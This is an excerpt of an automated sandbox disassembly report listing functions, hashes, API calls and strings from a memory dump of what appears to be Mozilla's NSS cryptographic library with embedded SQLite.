Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f4f8de5f74d473ad7a31c791aef8ff51a5719d150d62ef3c126f38064018ac6
Instruction ID: 5e0a6dda3d5e5906eff39295d772190a393dd9aedfdd95a266d36d1020f63da9
Opcode Fuzzy Hash: 7f4f8de5f74d473ad7a31c791aef8ff51a5719d150d62ef3c126f38064018ac6
Instruction Fuzzy Hash: 54D1D172B042168BCB0CCF68CA901BEB7F2BF98314719856ED455ABB91D775DA03CB84

Function 6C78A430 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14be7c52fef837614841b3e3570436e3f37af2e0f61efce650543a4246ab0887
Instruction ID: 2ca3974b3e34072ab5a424f11e829916fd6f492046145332a9ab75d559455fe1
Opcode Fuzzy Hash: 14be7c52fef837614841b3e3570436e3f37af2e0f61efce650543a4246ab0887
Instruction Fuzzy Hash: 9381A070A022058FDB18CF19D684BAABBE4FF48318F15817DE91A9B7D4DB34D981CB90

Function 6C768EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c235c778469c908188888b6195c34337e534f883589db312a2180aad853b8966
Instruction ID: 85772269306ed6f060212d7909bf1a2573831f66db85f77dbef2c698e1f87e9b
Opcode Fuzzy Hash: c235c778469c908188888b6195c34337e534f883589db312a2180aad853b8966
Instruction Fuzzy Hash: 1E119D32A002158BD714CF26D988B9AB3A9BF8231CF08427AD8158FE42C775E886C7C1

Function 6C840C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 005207e60937fb1fe5598cd68a2eef584fadeafff031d01e445dbadd68acbd89
Instruction ID: 387ae1043f323600d9da068388c65629caa9d269208999414f307bb6321cdd60
Opcode Fuzzy Hash: 005207e60937fb1fe5598cd68a2eef584fadeafff031d01e445dbadd68acbd89
Instruction Fuzzy Hash: 3911BC75604249CFCB20DF28C88066B77A2FF95368F14C879D8298B701DB71E806CBA1

Function 6C7B44C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2fa1a5ecec8fcb8e64a7be1615e61de5919e18eda902c0e4a6e59d94f431299
Instruction ID: 39ca63588547bf83a0ca84c1a091f31b4ea18828c73958d91ef2812797ed1991
Opcode Fuzzy Hash: d2fa1a5ecec8fcb8e64a7be1615e61de5919e18eda902c0e4a6e59d94f431299
Instruction Fuzzy Hash: CA11F7B6A002199F8B10CF99D9859EFBBF9EF8C664B554429ED19A7300D230ED108BE0

Function 6C7B4440 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b23cf7539c2a3dd4c42b3c9c81277a97aafa4af01b76294475e6dca98f3a1ef
Instruction ID: fbdd526616e8b31d53ef3040126b8db819229833ebaa37cda819c1d295090dfe
Opcode Fuzzy Hash: 2b23cf7539c2a3dd4c42b3c9c81277a97aafa4af01b76294475e6dca98f3a1ef
Instruction Fuzzy Hash: B9110975A002199F8B00CF59C9849EFB7F8EF4C214B16416AED18E7301D630ED10CBE1

Function 6C840D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 6812d79cce13ec76fe969c216d480c7c03adb4f4b1463c078b562b479e08346e
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 80E06D3A202058A7DB248E49C550BAA7359DF9161AFA4C979CC599BA01D733F8078B81

Function 6C798670 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$K11_$Alloc_ArenaArena_DoesFindMechanismTag_
String ID:
API String ID: 2003479236-0
Opcode ID: 23e773cf1430b448038cb5704f69fb380029e02cc391f3ea17a25ad626348aa6
Instruction ID: db465728d6807136976c3a1544c7ccf42fb159b682ff93d509e1549f5517c865
Opcode Fuzzy Hash: 23e773cf1430b448038cb5704f69fb380029e02cc391f3ea17a25ad626348aa6
Instruction Fuzzy Hash: 0DE0B6B0C08B489BD708DF6AD54506AFBE4AFD8214F00D91DFC9C87212E730A5D48B82

Function 6C76CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1780fd669f180d2d3ff48b230971e0e9ac02db7fbbfc2f500286e3bed2dedb2c
Instruction ID: 9ad117ff6351e41c3ec7abf1d939d8cc17f8e97802fb2e5db7c2c8b76a7430b9
Opcode Fuzzy Hash: 1780fd669f180d2d3ff48b230971e0e9ac02db7fbbfc2f500286e3bed2dedb2c
Instruction Fuzzy Hash: C2C04838244608CFC744DB08E489DA43BA8AB8961070440A4EA028B722DA21FC00CA80

Function 6C776740 Relevance: 45.6, APIs: 14, Strings: 12, Instructions: 122COMMON

Download Yara Rule

APIs

PL_strcasecmp.NSS3(?,other), ref: 6C77674D
PL_strcasecmp.NSS3(?,email), ref: 6C776763
PL_strcasecmp.NSS3(?,rfc822), ref: 6C776779
PL_strcasecmp.NSS3(?,dns), ref: 6C77678F
PL_strcasecmp.NSS3(?,x400), ref: 6C7767A5
PL_strcasecmp.NSS3(?,x400addr), ref: 6C7767BB
PL_strcasecmp.NSS3(?,directory), ref: 6C7767D1
PL_strcasecmp.NSS3(?,6C8AC3B1), ref: 6C7767E7
PL_strcasecmp.NSS3(?,edi), ref: 6C7767FD
PL_strcasecmp.NSS3(?,ediparty), ref: 6C776813
PL_strcasecmp.NSS3(?,uri), ref: 6C776829
PL_strcasecmp.NSS3(?,6C8AB3F4), ref: 6C77683F
PL_strcasecmp.NSS3(?,ipaddr), ref: 6C776851
PL_strcasecmp.NSS3(?,registerid), ref: 6C776863

Strings

ediparty, xrefs: 6C77680D
dns, xrefs: 6C776789
registerid, xrefs: 6C77685D
uri, xrefs: 6C776823
x400addr, xrefs: 6C7767B5
x400, xrefs: 6C77679F
edi, xrefs: 6C7767F7
email, xrefs: 6C77675D
directory, xrefs: 6C7767CB
other, xrefs: 6C776747
ipaddr, xrefs: 6C77684B
rfc822, xrefs: 6C776773

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: L_strcasecmp
String ID: directory$dns$edi$ediparty$email$ipaddr$other$registerid$rfc822$uri$x400$x400addr
API String ID: 4194642261-1102114343
Opcode ID: 71852034ae6ec728a8836e87d095545c5a27f1b37682c46cc394318dbd59a063
Instruction ID: d21ea9ff6e5a355576216cf8d39bb57f912f15c1aafa97c3302406148f553514
Opcode Fuzzy Hash: 71852034ae6ec728a8836e87d095545c5a27f1b37682c46cc394318dbd59a063
Instruction Fuzzy Hash: DF315205A0132962EE3012AB6F05B9A21694B1224FF042C76FC48E5F89FF45D72E95F6

Function 6C846E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C75F9C9,?,6C75F4DA,6C75F9C9,?,?,6C72369A), ref: 6C6FCA7A
Part of subcall function 6C6FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6FCB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C70BE66), ref: 6C846E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C70BE66), ref: 6C846E98
sqlite3_snprintf.NSS3(?,00000000,6C8AAAF9,?,?,?,?,?,?,6C70BE66), ref: 6C846EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C70BE66), ref: 6C846ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C70BE66), ref: 6C846EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C70BE66), ref: 6C846F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C846F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C846F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C70BE66), ref: 6C846FA6
sqlite3_snprintf.NSS3(?,00000000,6C8AAAF9,00000000,?,?,?,?,?,?,?,6C70BE66), ref: 6C846FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C846FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C846FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C70BE66), ref: 6C847014
sqlite3_free.NSS3(00000000,?,?,?,?,6C70BE66), ref: 6C84701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C70BE66), ref: 6C847030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C70BE66), ref: 6C84705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C70BE66), ref: 6C847079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C70BE66), ref: 6C847097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C8470A0

Strings

mz_etilqs_, xrefs: 6C846F18
winGetTempname5, xrefs: 6C847071
winGetTempname4, xrefs: 6C847046
winGetTempname1, xrefs: 6C84708F
winGetTempname2, xrefs: 6C8470C4

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: 8f4499dce5b591d702f2e72f99bd5fedf84d1de7e0a8394cd764b751ccbec3cd
Instruction ID: 18c66c3d647a5eeef0539f475df49e1801979c91936bd5bece78f5c7724e553b
Opcode Fuzzy Hash: 8f4499dce5b591d702f2e72f99bd5fedf84d1de7e0a8394cd764b751ccbec3cd
Instruction Fuzzy Hash: D8517BB1A0111567E33097349E55FBB36568F9230CF148D38E81696FC2FB25A50FC2D6

Function 6C7D4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000,00000000,00000001), ref: 6C7D5009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7D5049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7D505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C7D5071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D50A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C7D50B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2), ref: 6C7D50CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7D50D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7D50F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5153
free.MOZGLUE(?), ref: 6C7D516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C7D517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7D5195

Strings

name=, xrefs: 6C7D5057
config=, xrefs: 6C7D509B
library=, xrefs: 6C7D5043
parameters=, xrefs: 6C7D506B
nss=, xrefs: 6C7D5083

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: 39b4f7ddbb139041d975b7a65f757b0ea5a595f64629a3c7a8b1f2fa11860544
Instruction ID: e7c99b9cd1d05e2838c6d38c3227aefae915a288abc9750f81d43dddb011b1a0
Opcode Fuzzy Hash: 39b4f7ddbb139041d975b7a65f757b0ea5a595f64629a3c7a8b1f2fa11860544
Instruction Fuzzy Hash: BD51D7F1A012166BEB50DF24EE45AAA37B8DF06248F190430EC59E7741EB26F915C7F2

Function 6C7A8E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C7A8E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A8EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8EB3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A8EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C7A8EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C7A8F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8F29
PR_LogPrint.NSS3(?,00000000), ref: 6C7A8F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C7A8F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8F80
PR_LogPrint.NSS3(?,00000000), ref: 6C7A8F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C7A8FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C7A8FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C7A9047

Strings

hKey = 0x%x, xrefs: 6C7A8F5B, 6C7A8F6B
C_WrapKey, xrefs: 6C7A8E71
pMechanism = 0x%p, xrefs: 6C7A8EE0
pWrappedKey = 0x%p, xrefs: 6C7A8FAD
pulWrappedKeyLen = 0x%p, xrefs: 6C7A8FC8
hWrappingKey = 0x%x, xrefs: 6C7A8F01, 6C7A8F11
(CK_INVALID_HANDLE), xrefs: 6C7A8EAC, 6C7A8F1F, 6C7A8F79
hSession = 0x%x, xrefs: 6C7A8E8E, 6C7A8E9E
*pulWrappedKeyLen = 0x%x, xrefs: 6C7A9042

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: 22d289d204981b75711549e9f796da997a7af330e21ec90051e834ce6c293bac
Instruction ID: 5f8a812f1d23341897fc85f06023619daf93d30b87656baf1393657095106de6
Opcode Fuzzy Hash: 22d289d204981b75711549e9f796da997a7af330e21ec90051e834ce6c293bac
Instruction Fuzzy Hash: 5351F431502155EFDB209F988F4CF9A7B76AB4631CF048476F90867A12D734BC1ACB91

Function 6C7D4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4C5B
PR_smprintf.NSS3(6C8AAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7D4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7D4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7D4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C7D4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C7D4DA2
free.MOZGLUE(?), ref: 6C7D4DB9
free.MOZGLUE(00000000), ref: 6C7D4DCF

Strings

rootFlags, xrefs: 6C7D4D47
ootT, xrefs: 6C7D4D1A
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C7D4D9D
every, xrefs: 6C7D4CA1
%s,%s, xrefs: 6C7D4C4B
0x%08lx=[%s %s], xrefs: 6C7D4D80
slotFlags, xrefs: 6C7D4D34
rust, xrefs: 6C7D4D22
any, xrefs: 6C7D4C96
timeout, xrefs: 6C7D4C91

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
